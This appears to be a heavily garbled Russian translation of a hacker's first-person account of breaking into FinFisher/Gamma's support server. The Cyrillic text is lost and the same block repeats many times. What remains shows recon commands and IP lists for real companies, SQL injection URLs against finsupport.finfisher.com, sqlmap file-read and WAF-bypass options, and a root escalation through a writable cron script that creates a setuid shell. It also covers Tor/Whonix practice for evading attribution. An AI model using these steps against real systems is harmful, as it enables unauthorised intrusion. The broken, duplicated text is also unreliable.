, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-
www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-
academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,
fierce.pl
,
fierce.pl -dns
- IP-. , , .
Google . ,
academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,
academiproshop.com
, .
FinFisher
finsupport.finfisher.com
whois-
finfisher.com
, " FinFisher GmbH ".
"FinFisher GmbH" inurl:domaintools
gamma-international.de
,
finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .
fierce
git-,
git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.
fierce
, ,
test.company.com
dev.company.com
, . nikto .
webserver/.svn/
,
webserver/backup/
,
webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (
index.php
, , ).
Scripts/scripts.js.php
Google:
allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:
allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap
--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport .
/BackOffice/
403 Forbidden , SQL- ( ).
print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,
print.php
, . ! MySQL . ,
magicquotes
, MySQL-
INTO OUTFILE
. ,
sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,
unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,
cron
.
webalizer
, , . ,
cron
, ,
cron
.
ls -l /etc/localtime
, 6- ,
webalizer
, , , . , , , - , , . Root- , .
, . , , .
nmap
. nse-
nfs-*
smb-*
. finsupport - -,
qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
